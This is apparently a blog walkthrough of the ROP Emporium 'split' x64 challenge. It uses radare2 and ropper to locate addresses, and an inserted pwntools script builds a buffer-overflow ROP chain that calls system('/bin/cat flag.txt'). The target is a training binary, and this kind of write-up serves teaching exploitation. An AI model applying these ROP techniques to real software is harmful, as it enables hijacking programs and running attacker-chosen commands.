ROP Emporium : Split

Hey folks!
Today we are going to do another little ROP challenge and hopefully learn a bit about pwntools along the way. The binary is the x64 version of "Split" from ROP Emporium.

Let's start by enumerating the binary. I am going to load it in radare2 with r2, run aaa to analyze everything, and then look for interesting strings (if any).



Looking closely at the output, you'll see this entry:
vaddr=0x00601060 paddr=0x00001060 ordinal=036 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt


Let's take vaddr=0x00601060 and save it; this is one of the important addresses we will need to build our ROP chain, since "/bin/cat flag.txt" is the argument we want to hand to system().

With that out of the way, I listed the functions in the binary with the afl command. Among them, sym.usefulFunction and sym.main caught my attention, so I disassembled both of them.

As the snippet above shows, I took the system address from usefulFunction, i.e. 0x00400810.

With that done we are halfway there. The last piece is the address of a "pop rdi; ret" gadget, which we find with a tool called ropper.


So now we have the final element and can start building the exploit.

Once the exploit is complete, this is what it looks like; refer to the comments to get started with pwntools.
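The exploit script itself is not reproduced in the text above, so the following is an added example, not the post's own script, of the chain described here: padding up to the saved return address, then "pop rdi; ret", the address of "/bin/cat flag.txt", and the call to system taken from usefulFunction. The two addresses 0x00601060 and 0x00400810 come from the post's radare2 output; the "pop rdi; ret" gadget address and the 40-byte overflow offset are not stated in the text, so the script locates the gadget at runtime with pwntools and treats the offset as an assumption to be confirmed with a cyclic pattern. The chain is built with plain struct packing so the construction is visible without pwntools; only the process interaction needs it.

```python
#!/usr/bin/env python3
"""
Manual ROP chain for ROP Emporium "split" (x64).

Added example, not the post's own script. The string and system addresses are
the ones the post pulled out of radare2; the pop rdi gadget and the overflow
offset are assumptions (see comments).
"""
import struct


def p64(value: int) -> bytes:
    """Pack an address as 8 little-endian bytes (same as pwntools' p64)."""
    return struct.pack("<Q", value)


# From the post's enumeration of the binary (radare2 iz / pd output):
BIN_CAT_FLAG = 0x00601060  # .data string "/bin/cat flag.txt"
CALL_SYSTEM = 0x00400810   # the system call site inside usefulFunction

# ASSUMPTION: bytes from the start of the input buffer to the saved return
# address. Confirm it with a cyclic pattern (pwntools cyclic / cyclic_find)
# before relying on it; 40 is what a 32-byte buffer plus saved rbp gives on x64.
OFFSET = 40


def build_chain(pop_rdi: int, offset: int = OFFSET,
                arg: int = BIN_CAT_FLAG, target: int = CALL_SYSTEM) -> bytes:
    """
    Overwrite the saved return address with three qwords:

        pop rdi; ret            -> loads the next qword into rdi
        &"/bin/cat flag.txt"    -> becomes system()'s first argument
        call system             -> runs system(rdi)

    pop_rdi is the gadget address found with ropper (or pwntools' ROP below).
    """
    padding = b"A" * offset
    chain = p64(pop_rdi) + p64(arg) + p64(target)
    return padding + chain


def decode_chain(payload: bytes, offset: int = OFFSET) -> list:
    """Return the qwords that follow the padding, for eyeballing the chain."""
    body = payload[offset:]
    return [struct.unpack("<Q", body[i:i + 8])[0]
            for i in range(0, len(body) - len(body) % 8, 8)]


def main() -> None:
    # pwntools is only needed to find the gadget and talk to the process,
    # so it is imported here rather than at module level.
    from pwn import ELF, ROP, context, process

    context.arch = "amd64"
    elf = ELF("./split")                     # assumes the binary sits in cwd
    rop = ROP(elf)
    # Same gadget ropper reports; pwntools searches the binary for it.
    pop_rdi = rop.find_gadget(["pop rdi", "ret"]).address

    payload = build_chain(pop_rdi)
    print("chain:", [hex(q) for q in decode_chain(payload)])

    io = process(elf.path)
    io.recvuntil(b"> ")                      # split prompts with "> "
    io.sendline(payload)
    print(io.recvall(timeout=2).decode(errors="replace"))


if __name__ == "__main__":
    main()
```

Two things worth checking if the chain does not pop the flag: first, that the offset really is 40 (a cyclic pattern and the crashing rip tell you), and second, stack alignment. glibc's system() expects a 16-byte aligned stack; if it dies on a movaps instruction, insert one extra "ret" gadget before the pop rdi to shift rsp by 8.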

Exploit in action:


So that's how manual ROP works. I will be posting a fully automated ROP for split and an automated BoF for ret2win next!

Thank You!!
